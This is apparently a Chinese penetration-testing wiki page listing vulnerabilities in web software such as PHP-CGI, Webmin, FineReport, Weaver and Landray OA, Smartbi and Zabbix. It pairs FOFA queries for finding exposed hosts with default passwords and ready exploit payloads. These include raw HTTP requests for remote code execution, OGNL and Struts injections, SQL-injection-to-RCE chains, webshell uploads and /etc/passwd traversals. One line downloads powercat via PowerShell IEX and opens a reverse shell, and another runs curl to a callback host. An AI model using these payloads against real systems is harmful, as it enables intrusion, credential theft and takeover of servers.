  • POC | Payload | exp来源: https://vulhub.org/#/environments/php/CVE-2012-1823/```http://你的 IP 地址:端口号/index.php?-s 即爆出源码发送如下数据包,可见 Body 中的代码已被执行:POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1Host: example.comAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 31<?php echo shell_exec("id"); ?>```
  • MSF Moduleuse exploit/multi/http/php_cgi_arg_injection

CVE-2018-19518 PHP imap 远程命令执行漏洞

  • 描述php imap 扩展用于在 PHP 中执行邮件收发操作.其 imap_open 函数会调用 rsh 来连接远程 shell,而 debian/ubuntu 中默认使用 ssh 来代替 rsh 的功能 (也就是说,在 debian 系列系统中,执行 rsh 命令实际执行的是 ssh 命令) .因为 ssh 命令中可以通过设置 -oProxyCommand= 来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞.
  • 影响版本- php 5.6.0 ~ 5.6.38- php 7.0.0 ~ 7.0.32- php 7.1.0 ~ 7.1.24- php 7.2.0 ~ 7.2.12
  • POC | Payload | exp- PHP imap 远程命令执行漏洞 (CVE-2018-19518)

LFI with phpinfo

  • 描述PHP 文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来 getshell.因为临时文件名是随机的,如果目标网站上存在 phpinfo,则可以通过 phpinfo 来获取临时文件名,进而进行包含.
  • POC | Payload | exp- PHP文件包含漏洞 (利用phpinfo) - LFI with phpinfo

PHP 环境 XML 外部实体注入漏洞 (XXE)

  • 描述libxml2.9.0 以后,默认不解析外部实体.
  • POC | Payload | exp- PHP环境 XML外部实体注入漏洞 (XXE)

XDebug 远程调试漏洞 (代码执行)

  • 描述XDebug 是 PHP 的一个扩展,用于调试 PHP 代码.如果目标开启了远程调试模式,并设置 remote_connect_back = 1:xdebug.remote_connect_back = 1xdebug.remote_enable = 1这个配置下,我们访问 http://target/index.php?XDEBUG_SESSION_START=phpstorm ,目标服务器的 XDebug 将会连接访问者的 IP (或 X-Forwarded-For 头指定的地址) 并通过 dbgp 协议与其通信,我们通过 dbgp 中提供的 eval 方法即可在目标服务器上执行任意 PHP 代码.
  • 相关文章- 浅析常见Debug调试器的安全隐患
  • POC | Payload | exp- XDebug 远程调试漏洞 (代码执行)

PHP-FPM

PHP-FPM 是一个 PHPFastCGI 管理器,对于 PHP 5.3.3 之前的 php 来说,是一个补丁包 ,旨在将 FastCGI 进程管理整合进 PHP 包中。

PHP-FPM Fastcgi 未授权访问漏洞

  • 相关文章- Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写- PHP-FPM Fastcgi 未授权访问漏洞- 漏洞赏金和安全测试 | 关于fastcgi的一些小故事
  • POC | Payload | exp- https://github.com/vulhub/vulhub/tree/master/php/fpm- phith0n/fpm.py

CVE-2019-11043 PHP-FPM 远程代码执行漏洞

  • 描述在长亭科技举办的 Real World CTF 中,安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞.在使用一些有错误的 Nginx 配置的情况下,通过恶意构造的数据包,即可让 PHP-FPM 执行任意代码.
  • 影响版本- php 7.1.0 ~ 7.1.33- php 7.2.0 ~ 7.2.24- php 7.3.0 ~ 7.3.11
  • 相关文章- CVE-2019-11043PHP-FPM在Nginx特定配置下远程代码执行漏洞复现
  • POC | Payload | exp- PHP-FPM 远程代码执行漏洞 (CVE-2019-11043) - neex/phuip-fpizdam

PHPUnit

CVE-2017-9841 eval-stdin.php 远程命令执行漏洞

  • 相关文章- PHPUnit: A Security Risk?
  • POC | Payload | expcurl --data "<?php print str_rot13('V pna erzbgryl rkrphgr CUC pbqr ba lbhe freire');" http://localhost:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

PHPMailer

CVE-2017-5223 任意文件读取漏洞

  • 相关文章 - PHPMailer 任意文件读取漏洞

Portainer

fofa: app="portainer"

相关文章

  • Docker管理工具Portainer中的多个漏洞

Prometheus

fofa: app="Prometheus-Time-Series-Collection-and-Processing-Server"

相关文章

  • Prometheus API大规模暴露在互联网上|包括敏感信息

rConfig

fofa: app="rConfig"

rConfig 3.9.6 rce

  • 相关文章 - rConfig 3.9.6 - Magic Hash Auth Bypass to RCE

ResourceSpace

fofa: app="ResourceSpace"

CVE-2015-3648

  • POC | Payload | exp/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

CVE-2021-41765

  • 影响版本- ResourceSpace <= 9.5
  • 相关文章- ResourceSpace未授权SQL注入到RCE利用链(CVE-2021-41765)

CVE-2021-41950

  • 相关文章 - ResourceSpace目录穿越到任意文件删除利用链(CVE-2021-41950)

CVE-2021-41951

  • 影响版本- ResourceSpace <= 9.5
  • 相关文章- ResourceSpace反射型XSS(CVE-2021-41951)

SaltStack

fofa: app="SALTSTACK-产品"

CVE-2020-11651 SaltStack认证绕过

  • 默认端口4505 publish_port 提供远程执行命令发送功能4506 ret_port 支持认证、文件服务、结果收集等功能8000 salt‐api
  • 相关文章- CVE-2020-11651 SaltStack认证绕过分析
  • POC | Payload | exp- 0xc0d/CVE-2020-11651- jasperla/CVE-2020-11651-poc- lovelyjuice/cve-2020-11651-exp-plus

CVE-2020-16846/25592

  • 相关文章 - SaltStack未授权访问及命令执行漏洞分析(CVE-2020-16846/25592)

CVE-2021-25281/25282/25283

  • 相关文章 - SaltStack远程执行代码多个高危漏洞透析(CVE-2021-25281/25282/25283)

SAP

fofa: app="SAP-Web-Application-Server"

相关资源

  • lazaars/SAP-Pentest

CVE-2018-2380 SAP NetWeaver AS JAVA CRM Remote Command Execution via Log injection

  • POC | Payload | exp - erpscanteam/CVE-2018-2380

CVE-2020-6207 SAP Solution Manager RCE

  • POC | Payload | exp - chipik/SAP_EEM_CVE-2020-6207

CVE-2020-6287

  • POC | Payload | exp - chipik/SAP_RECON- duc-nt/CVE-2020-6287-exploit

CVE-2020-6308


Sentinel

项目地址: https://github.com/alibaba/Sentinel

sentinel-dashboard ssrf

  • 相关文章- 阿里巴巴Sentinel开源组件SSRF漏洞分析
  • POC | Payload | exp- Report a Sentinel Security Vulnerability about SSRF #2451curl -XGET 'http://127.0.0.1:8080/registry/machine?app=SSRF-TEST&appType=0&version=0&hostname=TEST&ip=localhost:12345%23&port=0'

SharePoint

CVE-2022-29108

  • 相关文章 - CVE-2022-29108&CVE-2022-22005 SharePoint远程命令执行漏洞分析与复现

ShenYu

fofa: body="id="httpPath"" && body="th:text="${domain}""

CVE-2021-37580 Apache ShenYu Admin 身份验证绕过漏洞

  • 相关文章- 【安全通报】Apache ShenYu Admin 身份验证绕过漏洞(CVE-2021-37580)- Apache ShenYu dashboardUser 身份验证绕过漏洞 CVE-2021-37580- Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580) 复现- Apache ShenYu管理系统登录认证绕过漏洞分析(CVE-2021-37580)- CVE-2021-37580 Apache ShenYu 管理员认证绕过漏洞分析
  • 影响范围- Apache ShenYu 2.3.0- Apache ShenYu 2.4.0
  • POC | Payload | exp/dashboardUser- Liang2580/CVE-2021-37580/

CVE-2021-45029 Apache ShenYu Groovy&SpEL表达式注入漏洞

  • 相关文章 - CVE-2021-45029 Apache ShenYu Groovy&SpEL表达式注入漏洞分析与复现

ShowDoc

fofa: app="ShowDoc"

ShowDoc 前台任意文件上传

  • 相关文章 - ShowDoc 前台任意文件上传

SkyWalking

fofa: app="APACHE-Skywalking"

Apache Skywalking <=8.3 SQL注入

  • 相关文章 - Apache Skywalking <=8.3 SQL注入分析复现- Skywalking远程代码执行漏洞分析

Smartbi

fofa: app="SMARTBI"

常见口令

  • demo/demo
  • manager/demo
  • admin/admin
  • admin/manager
  • admin/2manager

相关文章

  • smartBi总结
  • SmartBi全版本 SQl 注入&任意文件上传漏洞分析

Tips

任意文件读取

  • POC | Payload | exp/vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=%E4%B8%AD%E5%9B%BD%E7%9F%B3%E6%B2%B9%E5%90%89%E6%9E%97%E7%99%BD%E5%9F%8E%E9%94%80%E5%94%AE%E5%88%86%E5%85%AC%E5%8F%B8XX%E5%8A%A0%E6%B2%B9%E7%AB%99%E9%98%B2%E9%9B%B7%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E9%A2%84%E6%A1%88.docx

wsdl泄露

  • POC | Payload | exp/vision/services/CatalogService?wsdlSimpleReportService 提供灵活报表相关操作功能 https://127.0.0.1/vision/services/SimpleReportService?wsdlBusinessViewService 提供数据集定义相关操作功能 https://127.0.0.1/vision/services/BusinessViewService?wsdlDataSourceService 提供数据源相关操作功能 https://127.0.0.1/vision/services/DataSourceService?wsdlAnalysisReportService 提供多维分析相关操作功能 https://127.0.0.1/vision/services/AnalysisReportService?wsdlUserManagerService 提供用户相关操作,包括:读取/维护用户信息、读取/维护组信息、读取/维护角色信息、为用户和组分配角色等 https://127.0.0.1/vision/services/UserManagerService?wsdl

后台目录遍历

  • POC | Payload | exp/vision/chooser.jsp?key=CONFIG_FILE_DIR&root=C%3A%2F/vision/monitor/sysprops.jsp/vision/monitor/getclassurl.jsp?classname=smartbi.freequery.expression.ast.TextNode/vision/monitor/hardwareinfo.jsp

后台 session 窃取

  • POC | Payload | exps/vision/monitor/listsessions.jsp # 查看session

后台内存 dump

  • POC | Payload | exp/vision/monitor/heapdump.jsp # 缓存抓取密码,使用Eclipse Memory Analyzer解析内存文件/vision/monitor/heapdump.jsp?dumpbin=true

后台SSRF

  • POC | Payload | exp/vision/monitor/testmailserver.jsp

SolarWinds

CVE-2020-10148

  • 影响版本SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本
  • 相关文章- SolarWinds Orion漏洞分析之一: CVE-2020-10148从认证绕过到命令执行

CVE-2021-35215

  • 相关文章 - SolarWinds Orion漏洞分析之二:CVE-2021-35215 Json反序列化漏洞

SonarQube

fofa: app="sonarQube-代码管理"

管理员密码默认为

admin/admin

相关文章

  • 【新手入门系列】CVE-2020-*-系统梳理SonarQube API信息泄露漏洞

CVE-2020-27986

  • 相关文章- Atw组织攻击分析及cve 2020 27986进阶利用
  • POC | Payload | exp/api/settings/values 泄露SMTP、SVN和Gitlab密码。/api/webservices/list 泄露接口信息

Supervisord

项目地址 : https://github.com/Supervisor/supervisor

搭建教程

  • Supervisord 搭建

测试链接

  • http://[ip]:9001

CVE-2017-11610 Supervisord 远程命令执行漏洞

  • 描述supervisor 中的 XML-RPC 服务器允许远程身份验证的用户通过精心编制的与嵌套 supervisord 命名空间查找相关的 XML-RPC 请求执行任意命令。
  • 影响版本- supervisor < 3.0- supervisor 3.1.0 ~ 3.3.2
  • 相关文章- Supervisord远程命令执行漏洞 (CVE-2017-11610) - Supervisord 远程命令执行漏洞 (CVE-2017-11610)

TerraMaster-TOS

相关文章

  • TerraMaster TOS 多个漏洞复现

CVE-2020-15568 exportUser.php 远程命令执行

  • POC | Payload | exphttp://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>1.txthttp://xxx.xxx.xxx.xxx/include/1.txt

CVE-2020-28185 用户枚举漏洞

CVE-2020-28186 任意账号密码修改漏洞

CVE-2020-28187 后台任意文件读取漏洞

  • POC | Payload | exp/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd

CVE-2020-28188 upload

CVE-2022-24990 createRaid 远程命令执行

  • 相关文章 - TerraMaster TOS createRaid 远程命令执行 CVE-2022-24990

trojan多用户管理部署程序

相关文章

  • trojan多用户管理部署程序审计学习

命令注入漏洞

默认 jwt 密钥


TRS_WAS

Fofa: body="/was5/"

TRS(拓尔思)WCM任意文件上传漏洞

  • 描述file_upload.html 未做访问限制,攻击者可以匿名访问上传页面进行文件上传操作。
  • 影响版本- WCM5.2- WCM6.1
  • POC | Payload | expxxx.com/file/file_upload.html、infogate/file/file_upload.html

TRS(拓尔思)WAS 4.5 SQL注入漏洞

  • 描述rss.jsp 页面 "channelid" 参数未进行过滤
  • 影响版本- WAS 4.5
  • POC | Payload | exp/wcm/help/wcmhelp_list.jsp?trandom=0.3575719151171357&JspUrl=http://xxx/wcm/#/loginpage.jsp' and (select top 1 username+char(124)+password from wcmuser)>0--

CNVD-2020-27769 拓尔思TRSWAS_5.0任意文件读取

  • 描述该漏洞成因为 web/tree 接口 treefile 参数存在文件读取漏洞,可读取数据库配置文件、账户密码等信息,导致配置文件信息泄露威胁网站安全。
  • 影响版本- TRSWAS_5.0
  • POC | Payload | exphttp://xxx.com/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties

Unomi

Fofa: title="Unomi"

CVE-2020-13942 rce

  • POC | Payload | expPOST /context.json HTTP/1.1Host: x.x.x.xConnection: closePragma: no-cacheCache-Control: no-cachesec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://x.x.x.x/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 491{ "filters": [ { "id": "sample", "filters": [ { "condition": { "parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec('ping 1.dnslog.cn');" }, "type": "profilePropertyCondition" } } ] } ], "sessionId": "sample"}

Webmin

官网 : http://www.webmin.com/

搭建教程

  • Webmin 搭建

CVE-2019-12840

  • POC | Payload | exp - KrE80r/webmin_cve-2019-12840_poc

CVE-2019-15107 Webmin Remote Code Execution

  • 描述在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令.
  • 影响版本- Webmin < 1.920
  • 相关文章- Webmin(CVE-2019-15107) 远程代码执行漏洞之 backdoor 探究
  • POC | Payload | exp- vulhub/webmin/CVE-2019-15107/README.zh-cn.mdPOST /password_change.cgi HTTP/1.1Host: your-ip:10000Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeCookie: redirect=1; testing=1; sid=x; sessiontest=1Referer: https://your-ip:10000/session_login.cgiContent-Type: application/x-www-form-urlencodedContent-Length: 60user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

CVE-2019-15642 Webmin Remote Code Execution

  • 描述Webmin 到 1.920 中的 rpc.cgi 允许通过精心设计的对象名称进行经过身份验证的远程代码执行,因为 unserialise_variable 进行了 eval 调用。注意:Webmin_Servers_Index 文档指出“ RPC 可用于运行任何命令或修改服务器上的任何文件,这就是为什么不得将它的访问权限授予不可信的 Webmin 用户的原因。”
  • 影响版本- Webmin < 1.920
  • POC | Payload | exp- jas502n/CVE-2019-15642

CVE-2020-35606

  • POC | Payload | exp/package-updates/update.cgiapplication/x-www-form-urlencodedredir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26

XXL-job

fofa: app="XXL-JOB"

RESTful API 未授权访问RCE

  • 相关文章- XXL-job 执行器 RESTful API 未授权访问RCE
  • POC | Payload | exp- OneSourceCat/XxlJob-Hessian-RCE- jas502n/xxl-job

zabbix

官网 : https://www.zabbix.com
fofa: app="ZABBIX-监控系统"

zabbix 是一款服务器监控软件,其由 server、agent、web 等模块组成,其中 web 模块由 PHP 编写,用来显示数据库中的结果.

搭建教程

  • zabbix 搭建

CVE-2016-10134 zabbix latest.php SQL 注入漏洞

  • 描述Zabbix 的 latest.php 中的 toggle_ids[] 或 jsrpc.php 中的 profieldx2 参数存在 sql 注入,通过 sql 注入获取管理员账户密码,进入后台,进行 getshell 操作。
  • 影响版本- zabbix < 2.2.13- zabbix 3.0.0 ~ 3.0.3
  • 相关文章- zabbix latest.php SQL注入漏洞 (CVE-2016-10134) - 记一次zabbix安装及漏洞利用getshell全过程- Zabbix sql注入漏洞复现(CVE-2016-10134)

CVE-2020-11800 zabbix RCE

  • 描述Zabbix Server 的 trapper 命令处理,存在命令注入漏洞,可导致远程代码执行。
  • 相关文章- CVE-2020-11800 zabbix RCE漏洞细节披露- Zabbix Server trapper命令注入漏洞(CVE-2020-11800)- CVE-2020-11800 Zabbix远程代码执行漏洞

CVE-2021-27927

  • 相关文章 - CVE-2021-27927: Zabbix-CSRF-to-RCE

CVE-2022-23131

  • 相关文章- CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞分析与复现
  • POC | Payload | exp- Mr-xn/cve-2022-23131

CVE-2022-23134

  • 相关文章 - CVE-2022-23134 Zabbix漏洞分析之二:从未授权访问到接管后台

Zimbra

相关文章

  • zimbra RCE 漏洞利用

Zoho-ManageEngine

CVE-2020-28653

  • 相关文章 - CVE-2020-28653-如何绕过反序列化漏洞补丁-Zoho ManageEngine OpManager

任意文件上传

  • 相关文章 - Zoho ManageEngine Admanager Plus 任意文件上传漏洞可GetShell

CVE-2021-40539

  • 相关文章 - CVE-2021-40539-Zoho ManageEngine ADSelfService Plus如何从bypass到RCE

CVE-2021-41081

  • 相关文章 - CVE-2021-41081-通过逆向推理快速分析Zoho ManageEngine NCM SQL注入漏洞

CVE-2021-44077

  • 相关文章 - CVE-2021-44077 Zoho ManageEngine ServiceDesk Plus RCE漏洞

CVE-2021-44515

  • 相关文章 - CVE-2021-44515 Zoho ManageEngine Desktop Central Pre-auth RCE- 认证绕过新姿势之Zoho ManageEngine Desktop Central CVE-2021-44515

CVE-2022-28219

  • 相关文章 - CVE-2022-28219 Zoho 远程命令执行漏洞-组合Java XXE、反序列化和路径穿越漏洞实现匿名RCE

CVE-2022-29081

  • 相关文章 - CVE-2022-29081 Zoho卓豪会话管理系统存在认证绕过漏洞

宝塔

fofa: app="宝塔-Linux控制面板"

相关资源

  • Hzllaga/BT_Panel_Privilege_Escalation - 宝塔面板Windows版提权方法

宝塔面板 phpMyadmin 未授权访问

  • POC | Payload | expxxx.xxx.xxx.xxx:888/pma

宝塔 <6.0 存储形xss

  • 相关文章 - 宝塔linux面板 <6.0 存储形xss

禅道

fofa: app="易软天创-禅道系统"

CNVD-2020-65242 后台任意文件下载

  • POC | Payload | expindex.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=fileindex.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file

后台 im 模块 downloadXxdPackage 函数任意文件下载

  • POC | Payload | expindex.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd

12.4.2后台管理员权限Getshell

  • 相关文章 - 禅道12.4.2后台管理员权限Getshell复现

帆软

fofa: app="帆软-FineReport"
fofa: body="/WebReport/ReportServer"
fofa: body="isSupportForgetPwd"

帆软报表目录遍历

  • POC | Payload | exp/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

CNVD-2018-04757 帆软报表 v8.0 任意文件读取漏洞

  • 相关文章 - 帆软报表v8.0 Getshell漏洞分析- 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

帆软 V9 任意文件覆盖getshell

  • 相关文章- 帆软 V9 getshell
  • POC | Payload | expPOST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1Host: 192.168.10.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDEConnection: closeContent-Type:text/xml;charset=UTF-8Content-Length: 74{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}

帆软报表 FineRePort 未授权远程命令执行漏洞

  • 影响版本- 帆软报表 FineRePortv8.0- 帆软报表 FineRePortv9.0
  • POC | Payload | expxxx.com/WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin这个接口 打开 点查询 burp 拦截数据包 替换 post 的内容__parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://xxxx.ceye.io');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}``````POST /WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Connection: closeContent-Length: 675__parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://xxxx.dnslog.cn');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}

OA

本类包含 OA、ERP、CRM 等

蓝凌

FOFA: app="Landray-OA系统"

相关工具

  • yuanhaiGreg/LandrayExploit

蓝凌OA custom.jsp 任意文件读取漏洞

  • 相关文章- 蓝凌OA custom.jsp 任意文件读取漏洞
  • POC | Payload | expPOST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 42Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipvar={"body":{"file":"file:///etc/passwd"}}

蓝凌 OA SSRF+JNDI 远程命令执行

  • POC | Payload | exp配合文件读漏洞 读取 /WEB-INF/KmssConfig/admin.properties获取password后,使用 DES方法 解密,默认密钥为 kmssAdminKey访问后台地址使用解密的密码登录http://xxx.xxx.xxx.xxx/admin.do使用JNDI-Injection-Exploit 执行 getshell

CNVD-2021-01363-蓝凌 OA-EKP 后台 SQL 注入漏洞

  • 描述ordeby 参数存在注入
  • POC | Payload | exp/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true

蓝凌 OA xmldecoder 反序列化

  • 相关文章- 蓝某OA前台SSRF进一步利用到RCE- 记一次密码读取+SSRF渗透测试
  • POC | Payload | exp/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]

蓝凌 OA treexml.tmpl script 远程代码执行漏洞

  • POC | Payload | exp - tangxiaofeng7/Landray-OA-Treexml-Rce

泛微

官网 : https://www.weaver.com.cn/

相关文章

  • 应用安全 - 软件漏洞 - 泛微OA漏洞汇总
  • 泛微 e-mobile 相关漏洞

相关工具

  • z1un/weaver_exp

敏感文件泄露

  • /messager/users.data
  • /plugin/ewe/jsp/config.jsp

路径遍历

  • /plugin/ewe/admin/upload.jsp?id=11&dir=../../../
  • /weaver/weaver.file.SignatureDownLoad?markId=1+union+select+'../ecology/WEB-INF/prop/weaver.properties'

e-mobile

fofa: app="泛微-EMobile"

E-mobile

admin/admin111

E-Mobile 4.5 RCE

**.**.**.**/verifyLogin.do
data:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@**.**.**.**.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}

http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**:89/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

CNVD-2017-03561 e-mobile < 6.5 Ognl 表达式注入

  • 影响版本- v6.5- v5.5
  • 相关文章- 关于表达式注入的小记录- 泛微 E-Mobile Ognl 表达式注入- 泛微 E-Mobile Ognl 表达式注入
  • POC | Payload | exp/login.do?message=${}/manager/login.do?message=${}message=(#[email protected]@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

CNVD-2017-07285 S2-046

  • POC | Payload | expfilename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

CNVD-2021-25287 SQLi to RCE

  • 影响版本- v6.6
  • 相关文章- 泛微e-mobile6.6前台RCE漏洞分析与复现
  • POC | Payload | exp- https://github.com/YinWC/2021hvv_vul/blob/master/0410/泛微e-mobile 0day.md/messageType.do/client.doCREATE ALIAS EXEC AS$$ void e(String cmd) throws java.io.IOException{java.lang.Runtime rt= java.lang.Runtime.getRuntime();rt.exec(cmd);}$$CALL EXEC('whoami');

e-cology

fofa: app="Weaver-OA"
fofa: app="泛微-协同办公 OA"

指纹

  • Set-Cookie: ecology_JSessionId=
  • ecology

OA 默认口令

sysadmin/1

/services/MobileService?wsdl 注入

  • 相关文章 - 泛微e-cology7.1 SOAP注入引发的血案- 泛微协同商务系统e-cology某处SQL注入

泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705

  • 相关文章- 泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705
  • POC | Payload | exp/sysinterface/codeEdit.jsp

e-cology OA Beanshell 组件远程代码执行

  • 相关文章- [漏洞预警]泛微e-cology OA Beanshell组件远程代码执行分析- 泛微e-cology OA Beanshell组件远程代码执行漏洞复现
  • POC | Payload | exp- jas502n/e-cology/weaver/bsh.servlet.BshServlet``````eval%00("ex"%2b"ec(\"whoami\")"); 也可以换成 ex\u0065c("cmd /c dir");泛微多数都是 windows 环境, 反弹 shell 可以使用 pcatpowershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd

ecology8_mobile_sql_inject

  • POC | Payload | exp - ecology8_mobile_sql_inject

泛微 OA WorkflowCenterTreeData 接口注入漏洞(限 oracle 数据库)

  • POC | Payload | exp - AdministratorGithub/e-cology-OA-SQL

泛微 ecology OA 系统接口存在数据库配置信息泄露漏洞

  • 相关文章- 泛微ecology OA数据库配置信息泄露漏洞复现
  • POC | Payload | exp- jas502n/DBconfigReader- NS-Sp4ce/Weaver-OA-E-cology-Database-Leak

泛微OA V8 SQL注入漏洞

  • 描述泛微 OA V8 存在 SQL 注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限
  • POC | Payload | exp/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

泛微OA V9前台上传漏洞

  • 描述泛微 OA V9 存在文件上传接口导致任意文件上传, 漏洞位于: /page/exportImport/uploadOperation.jsp 文件中
  • POC | Payload | expPOST /page/exportImport/uploadOperation.jsp HTTP/1.1Host: x.x.x.xContent-Length: 216Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://x.x.x.x/Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwoConnection: close------WebKitFormBoundaryFy3iNVBftjP6IOwoContent-Disposition: form-data; name="file"; filename="12.jsp"Content-Type: application/octet-stream<%out.print(1111);%>------WebKitFormBoundaryFy3iNVBftjP6IOwo--``````page/exportImport/fileTransfer/12.jsp

泛微OA V9 E-Cology WorkflowServiceXml RCE

  • 描述泛微 E-cology OA 系统的 WorkflowServiceXml 接口可被未授权访问,攻击者调用该接口,可构造特定的 HTTP 请求绕过泛微本身一些安全限制从而达成远程代码执行
